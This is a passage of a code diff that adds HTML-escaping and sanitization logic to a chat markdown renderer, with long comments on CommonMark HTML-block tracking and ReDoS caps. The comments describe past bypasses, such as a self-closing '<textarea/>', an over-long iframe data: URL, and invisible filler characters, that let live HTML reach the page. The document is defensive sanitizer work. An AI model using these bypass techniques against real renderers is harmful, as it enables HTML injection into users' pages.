+ // either to be seen. Guarded on "this line opened no list marker", which is
3157
+ // what makes it a continuation line at all.
3158
+ if (openedListCol < 0 && indentBudget > 0) {
3159
+ let i = 0
3160
+ while (i < indentBudget && i < rest.length && rest[i] === ' ') i++
3161
+ indentBudget = 0
3162
+ if (i > 0) {
3163
+ rest = rest.slice(i)
3164
+ continue
3165
+ }
3166
+ }
3167
+ break
3168
+ }
3169
+ return { text: rest, openedListCol }
3170
+ }
3171
+
3172
+ /**
3173
+ * `line` MUST be the CONTAINER-NORMALIZED text (`norm.text`), not the raw line.
3174
+ * Kind 4's end condition is a bare `>`, which EVERY blockquote prefix contains —
3175
+ * fed the raw line, `> <!DOCTYPE html` self-terminated on its own start line, so
3176
+ * the range was never recorded and the balance guard went blind for the rest of
3177
+ * the block. Kinds 1/2/3/5 cannot have their closers inside a container prefix,
3178
+ * so for them the two are equivalent; passing `norm.text` uniformly removes the
3179
+ * asymmetry rather than documenting it as a fifth under-detection residual.
3180
+ */
3181
+ function htmlBlockEnds(kind: number, line: string): boolean {
3182
+ switch (kind) {
3183
+ case 1:
3184
+ return HTML_BLOCK_END_1.test(line)
3185
+ case 2:
3186
+ return line.indexOf('-->') !== -1
3187
+ case 3:
3188
+ return line.indexOf('?>') !== -1
3189
+ case 4:
3190
+ return line.indexOf('>') !== -1
3191
+ default:
3192
+ return line.indexOf(']]>') !== -1
3193
+ }
3194
+ }
3195
+
3196
+ function htmlBlockStartKind(line: string, inParagraph: boolean): number | null {
3197
+ if (line.indexOf('<') === -1) return null
3198
+ if (HTML_BLOCK_START_1.test(line)) return 1
3199
+ if (HTML_BLOCK_START_2.test(line)) return 2
3200
+ if (HTML_BLOCK_START_3.test(line)) return 3
3201
+ if (HTML_BLOCK_START_5.test(line)) return 5
3202
+ if (HTML_BLOCK_START_4.test(line)) return 4
3203
+ const six = HTML_BLOCK_START_6.exec(line)
3204
+ if (six && HTML_BLOCK_TYPE_6_TAGS.has(six[2].toLowerCase())) return 6
3205
+ // Condition 7 is the ONLY one that cannot interrupt a paragraph.
3206
+ if (!inParagraph && HTML_BLOCK_START_7.test(line)) return 7
3207
+ return null
3208
+ }
3209
+
3210
+ function computeHtmlBlockRanges(text: string): HtmlBlockRange[] {
3211
+ if (text.indexOf('<') === -1) return []
3212
+ const ranges: HtmlBlockRange[] = []
3213
+ const fences = createFenceTracker()
3214
+ let kind: number | null = null
3215
+ let start = 0
3216
+ let lastEnd = 0
3217
+ let inParagraph = false
3218
+ let offset = 0
3219
+ // Container state for the normalization above. `listContentCol` is the width
3220
+ // of the innermost list marker seen; `openPrefixLen` is how many prefix
3221
+ // COLUMNS the CURRENTLY open block consumed on its OPENING line, which decides
3222
+ // whose notion of "blank line" terminates a type-6/7 block (see below).
3223
+ let listContentCol = 0
3224
+ let openPrefixLen = 0
3225
+ for (const line of text.split('\n')) {
3226
+ const lineStart = offset
3227
+ const lineEnd = offset + line.length
3228
+ offset = lineEnd + 1
3229
+ // Columns, not characters (see `expandTabs`). Every comparison against "the
3230
+ // line as written" below must use THIS, or a tab-prefixed container reads as
3231
+ // a container that opened nothing.
3232
+ const expanded = expandTabs(line)
3233
+ const norm = stripContainerPrefix(expanded, listContentCol)
3234
+ if (norm.openedListCol >= 0) listContentCol = norm.openedListCol
3235
+ else if (!isBlankLine(norm.text) && norm.text === expanded) listContentCol = 0
3236
+ const normBlank = isBlankLine(norm.text)
3237
+ // A type-6/7 block ends at the first blank line. At top level the raw line
3238
+ // decides — a bare `-` or `>` line inside a top-level HTML block is CONTENT,
3239
+ // and treating it as blank would END the range early (the one
3240
+ // under-detecting direction).
3241
+ //
3242
+ // Inside a container the container's own filler (`>`, `> >`, the item's
3243
+ // indent) IS that blank line, so the block must end there — but ONLY the
3244
+ // filler of the container the block actually opened in. Round 13 used the
3245
+ // fully-stripped `norm.text` here, and `stripContainerPrefix` strips ANY
3246
+ // container markers, not the ones that were open. So a line holding a
3247
+ // DIFFERENT container's opener (` >` under a `- <div>`, `> -` under a
3248
+ // `> <div>`) normalized to empty, read as blank, and ended the range early —
3249
+ // re-opening the very shelter the range exists to expose (verified: 1 live
3250
+ // `<textarea>`, where the same input WITHOUT the filler line rendered 0).
3251
+ // Under CommonMark that line is HTML content and the block continues.
3252
+ //
3253
+ // So termination strips at most the OPENING line's prefix width: ` >`
3254
+ // minus 2 columns is `>`, non-blank, block continues; a genuine filler (`>`
3255
+ // under `> `, two spaces under `- `) still normalizes to empty and still
3256
+ // terminates. Measured in expanded columns, consistently with `expandTabs`.
3257
+ // `isBlankLine`, NOT `trim()`. This is THE place the distinction bit: an
3258
+ // NBSP / VT / FF / BOM filler line ended a tracked type-6/7 range while
3259
+ // remark kept the HTML block open, so the inline-code shelter below it
3260
+ // stopped being "inside a tracked block", the balance guard went blind, and
3261
+ // a live `<textarea>` / third-party `<iframe>` reached the DOM
3262
+ // (`escapeUnknownHtmlTags` returned the input BYTE-IDENTICAL). One
3263
+ // invisible character reopened the whole shelter class.
3264
+ const blank =
3265
+ openPrefixLen > 0 ? isBlankLine(expanded.slice(openPrefixLen)) : isBlankLine(line)
3266
+ if (kind !== null) {
3267
+ // Types 6 and 7 end at (and EXCLUDE) the first blank line; 1..5 end on
3268
+ // the line that satisfies their closer, INCLUSIVE.
3269
+ if (kind >= 6) {
3270
+ if (blank) {
3271
+ ranges.push({ start, end: lastEnd })
3272
+ kind = null
3273
+ openPrefixLen = 0
3274
+ inParagraph = false
3275
+ continue
3276
+ }
3277
+ lastEnd = lineEnd
3278
+ continue
3279
+ }
3280
+ lastEnd = lineEnd
3281
+ if (htmlBlockEnds(kind, norm.text)) {
3282
+ ranges.push({ start, end: lineEnd })
3283
+ kind = null
3284
+ openPrefixLen = 0
3285
+ inParagraph = false
3286
+ }
3287
+ continue
3288
+ }
3289
+ // Outside a block: keep fence state, so a start condition written inside a
3290
+ // genuine fenced code sample cannot open one. Fed the RAW line ON PURPOSE —
3291
+ // the tracker is a shared CommonMark machine with two other consumers and
3292
+ // feeding it normalized lines would let a `>`-prefixed delimiter INSIDE a
3293
+ // top-level fence close it early. The cost is that a fence written inside a
3294
+ // blockquote is invisible here, so its content lines can open a bogus block:
3295
+ // more detection, i.e. the fail-CLOSED direction.
3296
+ if (fences.push(line) !== 'text') {
3297
+ inParagraph = false
3298
+ continue
3299
+ }
3300
+ const started = htmlBlockStartKind(norm.text, inParagraph)
3301
+ if (started !== null) {
3302
+ inParagraph = false
3303
+ // 1..5 may satisfy their end condition on the START line itself.
3304
+ if (started < 6 && htmlBlockEnds(started, norm.text)) {
3305
+ ranges.push({ start: lineStart, end: lineEnd })
3306
+ continue
3307
+ }
3308
+ kind = started
3309
+ openPrefixLen = expanded.length - norm.text.length
3310
+ start = lineStart
3311
+ lastEnd = lineEnd
3312
+ continue
3313
+ }
3314
+ // Paragraph state uses the NORMALIZED blank: a container's own filler line
3315
+ // (`>`, `> >`) separates paragraphs inside the container. Erring toward
3316
+ // "not in a paragraph" only ENABLES the type-7 start condition — more
3317
+ // detection, the fail-CLOSED direction.
3318
+ inParagraph =
3319
+ !normBlank && leadingIndent(norm.text) < 4 && !NON_PARAGRAPH_LINE_RE.test(norm.text)
3320
+ }
3321
+ // An unterminated block runs to end of input, exactly as the tokenizer treats it.
3322
+ if (kind !== null) ranges.push({ start, end: lastEnd })
3323
+ return ranges
3324
+ }
3325
+
3326
+ /**
3327
+ * Tag-like starts the MAIN pass could not consume — `TAG_LIKE_REGEX` hard-bounds
3328
+ * its attribute run at 4096 chars (ReDoS hardening), so a longer run makes the
3329
+ * whole tag fail to match and NEITHER the allowlist NOR the RAWTEXT closer check
3330
+ * ever runs: a live `<iframe src="data:text/html;base64,…4KB+…">` reached the DOM
3331
+ * verbatim. The cap must stay (removing it reintroduces the backtracking blowup),
3332
+ * so instead an over-long tag FAILS CLOSED here: only its `<` is escaped, which
3333
+ * degrades it to visible text rather than a live opener.
3334
+ *
3335
+ * Applied ONLY to the gaps BETWEEN main-pass matches, so a tag the main pass
3336
+ * already decided on can never be touched twice (no `&amp;lt;`).
3337
+ *
3338
+ * Shape is deliberately trivial — one bounded quantifier over disjoint character
3339
+ * classes and a single-char lookahead, so there is no alternation to backtrack
3340
+ * across and failure costs at most 64 steps per candidate `<`.
3341
+ *
3342
+ * MEASURED COST (round 12, this repo's vitest/jsdom env, `escapeUnknownHtmlTags`
3343
+ * over a document of nothing but max-length never-closed tag names — the
3344
+ * pathological shape for this pass): 61.2 / 122.1 / 257.2 / 492.2 ms at 325KB /
3345
+ * 650KB / 1.3MB / 2.6MB. Dead linear at ~190 ns/char, so there is no
3346
+ * algorithmic blowup — only a large constant on an input no real message has.
3347
+ * Realistic chat/post output (≤256KB) lands around 50ms. An earlier note in the
3348
+ * remediation record claimed 5.2ms for the 1.3MB case; that figure was wrong by
3349
+ * ~50x and is corrected here.
3350
+ *
3351
+ * NOT APPLIED INSIDE CODE (round 12). The candidate shape here is ANY
3352
+ * `<[a-zA-Z…]` followed by whitespace or `>`, not just the over-long tag it was
3353
+ * written for — so ordinary pseudo-code (` if a <b then` in an indented
3354
+ * block) was escaped to a visible `&lt;`, since entity references are NOT
3355
+ * decoded inside code. That is the very argument that scoped the balance guard
3356
+ * away from inline code, applied here. The MASK already knows which regions are
3357
+ * code and the offsets are exact, so each candidate is checked against it
3358
+ * individually (per-candidate, not per-gap: a gap routinely spans both prose and
3359
+ * code).
3360
+ *
3361
+ * THE 4096-CHAR CAP HAS TWO CONSUMERS THAT ROUND IN OPPOSITE DIRECTIONS — and
3362
+ * getting that asymmetry wrong is what hid a live fail-open for six review
3363
+ * rounds (round 16). "This span is not KNOWN to be code" means:
3364
+ *
3365
+ * consumer | not-known-to-be-code ⇒ | fail direction
3366
+ * -------------------------------|------------------------|---------------
3367
+ * this pass (`isMaskedBlank`) | ESCAPE the `<` | CLOSED (cosmetic:
3368
+ * | | a visible `&lt;`)
3369
+ * the CARVE (`PROTECTED_SPAN_RE`)| ESCAPE the span | CLOSED (cosmetic:
3370
+ * | | code renders as
3371
+ * | | escaped text)
3372
+ * the MASK's closer haystack | ADMIT a `</tag>` closer| **OPEN** (a live
3373
+ * (`hasLaterCloser`) | | RAWTEXT opener
3374
+ * | | swallows the rest
3375
+ * | | of the message)
3376
+ *
3377
+ * The previous version of this note analysed the over-cap span for THIS pass
3378
+ * only, concluded "the safe direction", and stopped — true here, false for the
3379
+ * haystack, where the identical cap silently un-blanked a `</textarea>` written
3380
+ * inside an over-long inline span and re-opened the RAWTEXT swallow this module
3381
+ * exists to close. A residual note must state the fail direction PER CONSUMER;
3382
+ * a single "safe direction" verdict for a value read by passes that round
3383
+ * opposite ways is not a finding, it is an averaging error.
3384
+ *
3385
+ * RESOLVED for the haystack: the mask no longer uses a capped regex at all
3386
+ * (`findInlineCodeRanges` — linear, uncapped), so an over-long inline span is
3387
+ * blanked like any other and the haystack's fail-OPEN row above no longer has
3388
+ * an over-cap case. Pinned by the `spanLength` axis of the swallow sweep
3389
+ * (cap−k and cap+k for every shelter spelling).
3390
+ * RESIDUAL, deliberately kept: the CARVE keeps its cap, and so does this pass's
3391
+ * view of an over-cap span in a document the mask ALSO declines to blank — both
3392
+ * of those round CLOSED per the table, i.e. they cost at worst a visible `&lt;`.
3393
+ */
3394
+ const LEFTOVER_TAG_START_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9-]{0,63})(?=[\s>])/g
3395
+
3396
+ function escapeLeftoverTagStarts(gap: string, lowerSource: string, gapOffset: number): string {
3397
+ if (gap.indexOf('<') === -1) return gap
3398
+ LEFTOVER_TAG_START_RE.lastIndex = 0
3399
+ return gap.replace(
3400
+ LEFTOVER_TAG_START_RE,
3401
+ (m: string, slash: string, tag: string, at: number) =>
3402
+ isMaskedBlank(lowerSource, gapOffset + at, gapOffset + at + m.length)
3403
+ ? m
3404
+ : `&lt;${slash}${tag}`,
3405
+ )
3406
+ }
3407
+
3408
+ export function escapeUnknownHtmlTags(
3409
+ text: string,
3410
+ allowedTags: Set<string> = SAFE_HTML_TAGS,
3411
+ ): string {
3412
+ if (!text || text.indexOf('<') === -1) return text
3413
+ // Masked, length-preserving, lowercased whole-document copy for the RAWTEXT
3414
+ // closer lookup — the closer may live in a later segment than the opener,
3415
+ // so the search must span the ENTIRE source, not the segment being escaped,
3416
+ // and must ignore closers that are only code samples / attribute text.
3417
+ const lowerSource = buildCloserHaystack(text)
3418
+ // HTML-block ranges for the CARVE BALANCE GUARD below. Computed LAZILY: only
3419
+ // a protected span that actually carries an unbalanced RAWTEXT opener needs
3420
+ // them, which no ordinary message has.
3421
+ let htmlBlocks: HtmlBlockRange[] | null = null
3422
+ const spanInsideHtmlBlock = (from: number, to: number): boolean => {
3423
+ htmlBlocks ??= computeHtmlBlockRanges(text)
3424
+ return htmlBlocks.some((r) => r.start < to && r.end > from)
3425
+ }
3426
+ // Carve out fenced code blocks AND inline-backtick spans so `<their>`
3427
+ // examples inside code are preserved verbatim.
3428
+ const parts: string[] = []
3429
+ let cursor = 0
3430
+ PROTECTED_SPAN_RE.lastIndex = 0
3431
+ let span: RegExpExecArray | null
3432
+ while ((span = PROTECTED_SPAN_RE.exec(text)) !== null) {
3433
+ if (span.index > cursor) {
3434
+ parts.push(
3435
+ escapeOutsideFences(text.slice(cursor, span.index), allowedTags, lowerSource, cursor),
3436
+ )
3437
+ }
3438
+ // INTERSECTION GUARD (soundness, not an instance patch). A protected span
3439
+ // is pushed through VERBATIM, so a live RAWTEXT opener inside one never
3440
+ // reaches `escapeOutsideFences` at all and the mask's correctness is
3441
+ // bypassed. Carve and mask run different engines, so the carve CAN protect
3442
+ // a region the mask correctly blanked — `PROTECTED_SPAN_RE`'s closer
3443
+ // alternative accepts an info string, ends its span early, desyncs, and can
3444
+ // open a new span from a line CommonMark treats as ordinary text. Protect
3445
+ // only what BOTH engines call code: if the mask left anything non-blank
3446
+ // over this exact range, escape the span instead.
3447
+ //
3448
+ // CARVE BALANCE GUARD (the residual fail-open the intersection alone does
3449
+ // NOT close). The intersection only reconciles DISAGREEMENT; when BOTH
3450
+ // engines over-detect the SAME region it is a no-op. CommonMark says an
3451
+ // HTML block (type 1 `<pre>`/`<details>`, type 6 `<div>`) runs to its
3452
+ // terminator, so a ``` line inside one is HTML CONTENT and not a fence —
3453
+ // and NEITHER `createFenceTracker` nor `PROTECTED_SPAN_RE` models HTML
3454
+ // blocks, so both open a bogus fence at the same line and shelter whatever
3455
+ // follows. So the range check is paired with a self-containment check: a
3456
+ // protected span is by definition a complete code region, therefore any
3457
+ // RAWTEXT opener inside it must be BALANCED within it. An unbalanced one
3458
+ // means the span is not really code — route it through the escaper. This
3459
+ // is engine-independent (it needs no HTML-block tracking).
3460
+ //
3461
+ // GATED ON HTML-BLOCK MEMBERSHIP, NOT ON THE SPAN'S FLAVOR (round 12). The
3462
+ // property that makes a protected span "not really code" is that it sits
3463
+ // inside an HTML BLOCK — where CommonMark says every line is HTML content.
3464
+ // Two earlier rounds gated on flavor instead and traded one hole for the
3465
+ // other:
3466
+ // - round 9 applied the guard to BOTH alternatives. That over-applied to
3467
+ // inline code, where entity references are NOT recognized, so an escaped
3468
+ // `&lt;title&gt;` was shown to the reader LITERALLY — and naming a tag in
3469
+ // inline code (`` `<title>` ``) is the single most common way a docs
3470
+ // answer mentions one.
3471
+ // - round 11 scoped it to FENCES, justified by "an inline span cannot
3472
+ // shelter a live opener: remark emits it as an `inlineCode` TEXT node, so
3473
+ // parse5 never tokenizes its content". That invariant is asserted in a
3474
+ // comment and holds only OUTSIDE an HTML block. Inside one, remark emits
3475
+ // raw HTML, backticks are not code, and `` `<textarea>` `` on its own
3476
+ // line inside `<div>` / `<pre>` / `<details>` / `<span>` sheltered a live
3477
+ // opener that swallowed the rest of the message.
3478
+ // Membership covers BOTH spellings with one property, and leaves ordinary
3479
+ // prose inline code untouched. `isFence` is kept as an independent
3480
+ // sufficient condition: a fenced span that the mask blanked but the HTML
3481
+ // walk does not consider part of a block (the two engines can still desync)
3482
+ // must stay under the round-9 guarantee.
3483
+ // Group 1 is the fence marker, group 2 the inline backtick run.
3484
+ //
3485
+ // PROPERTY GUARANTEED: no protected span that is either a FENCE or inside an
3486
+ // HTML BLOCK can carry an unbalanced RAWTEXT opener into the output
3487
+ // verbatim. That is strictly weaker than "the carve never over-detects" — an
3488
+ // over-detected span with no RAWTEXT opener in it is still pushed verbatim,
3489
+ // which stays cosmetic-only.
3490
+ const isFence = span[1] !== undefined
3491
+ const spanEnd = span.index + span[0].length
3492
+ parts.push(
3493
+ isMaskedBlank(lowerSource, span.index, spanEnd) &&
3494
+ !(
3495
+ hasUnbalancedRawtextOpener(span[0]) &&
3496
+ (isFence || spanInsideHtmlBlock(span.index, spanEnd))
3497
+ )
3498
+ ? span[0]
3499
+ : escapeOutsideFences(span[0], allowedTags, lowerSource, span.index),
3500
+ )
3501
+ cursor = span.index + span[0].length
3502
+ }
3503
+ if (cursor < text.length) {
3504
+ parts.push(escapeOutsideFences(text.slice(cursor), allowedTags, lowerSource, cursor))
3505
+ }
3506
+ return parts.join('')
3507
+ }
3508
+
3509
+ /**
3510
+ * Walks `segment` tag by tag rather than using `String.replace`, so the regions
3511
+ * the main regex did NOT consume are addressable: each gap is handed to
3512
+ * `escapeLeftoverTagStarts` (see it for the over-long-attribute fail-open it
3513
+ * closes), while every matched tag keeps its ORIGINAL index. Preserving that
3514
+ * index matters — `hasLaterCloser` indexes `lowerSource`, which is built from
3515
+ * the untouched text, so any offset drift reopens the round-5 desync class.
3516
+ */
3517
+ function escapeOutsideFences(
3518
+ segment: string,
3519
+ allowedTags: Set<string>,
3520
+ lowerSource: string,
3521
+ segmentOffset: number,
3522
+ ): string {
3523
+ const out: string[] = []
3524
+ let cursor = 0
3525
+ TAG_LIKE_REGEX.lastIndex = 0
3526
+ let m: RegExpExecArray | null
3527
+ while ((m = TAG_LIKE_REGEX.exec(segment)) !== null) {
3528
+ const [match, slash, tag, rest, selfClose] = m
3529
+ if (m.index > cursor)
3530
+ out.push(
3531
+ escapeLeftoverTagStarts(
3532
+ segment.slice(cursor, m.index),
3533
+ lowerSource,
3534
+ segmentOffset + cursor,
3535
+ ),
3536
+ )
3537
+ const lower = tag.toLowerCase()
3538
+ const escaped = `&lt;${slash}${tag}${rest}${selfClose}&gt;`
3539
+ if (!allowedTags.has(lower)) {
3540
+ out.push(escaped)
3541
+ } else if (slash === '' && RAWTEXT_TAGS.has(lower)) {
3542
+ // Allowlisted — but an UNCLOSED RAWTEXT opener would swallow the rest of
3543
+ // the document during tokenization, before any allowlist applies.
3544
+ //
3545
+ // The SELF-CLOSED spelling counts as an opener (round 11): HTML ignores
3546
+ // the self-closing flag on non-void, non-foreign elements, so parse5
3547
+ // tokenizes `<textarea/>` as a start tag and enters RAWTEXT identically.
3548
+ // Excluding it here left the entire defense — prose openers, HTML-block
3549
+ // shelters, all of it — bypassable by one extra slash. `RAWTEXT_TAGS` has
3550
+ // no void members, so nothing legitimate self-closes.
3551
+ //
3552
+ // COSMETIC COST (accepted, fail-closed): self-closing IS honored in
3553
+ // foreign content, so an EMPTY `<title/>` inside `<svg>` now escapes
3554
+ // rather than rendering. It carries no accessible name either way, and
3555
+ // the real a11y form `<title>Chart</title>` is unaffected. SECOND COST
3556
+ // added by the same round: a protected span the balance guard deems
3557
+ // not-really-code is routed through this function whole, so bare `<tag`
3558
+ // starts in its GAPS are escaped too — the mask check in
3559
+ // `escapeLeftoverTagStarts` keeps that off genuine code regions.
3560
+ const afterTag = segmentOffset + m.index + match.length
3561
+ out.push(hasLaterCloser(lowerSource, lower, afterTag) ? match : escaped)
3562
+ } else {
3563
+ out.push(match)
3564
+ }
3565
+ cursor = m.index + match.length
3566
+ }
3567
+ if (cursor < segment.length)
3568
+ out.push(escapeLeftoverTagStarts(segment.slice(cursor), lowerSource, segmentOffset + cursor))
3569
+ return out.join('')
3570
+ }
3571
+
3572
+ // ---------------------------------------------------------------------------
3573
+ // URL transform
3574
+ // ---------------------------------------------------------------------------
3575
+ /**
3576
+ * Extends react-markdown's default safe-protocol allowlist with the two
3577
+ * internal schemes the chat remark plugins emit (`card://`, `mention://`),
3578
+ * for `href` ONLY. All other URLs go through `defaultUrlTransform`.
3579
+ */
3580
+ export function cardAwareUrlTransform(url: string, key: string): string {
3581
+ if (key === 'href' && typeof url === 'string' && (url.startsWith('card://') || url.startsWith('mention://')))
3582
+ return url
3583
+ return defaultUrlTransform(url)
3584
+ }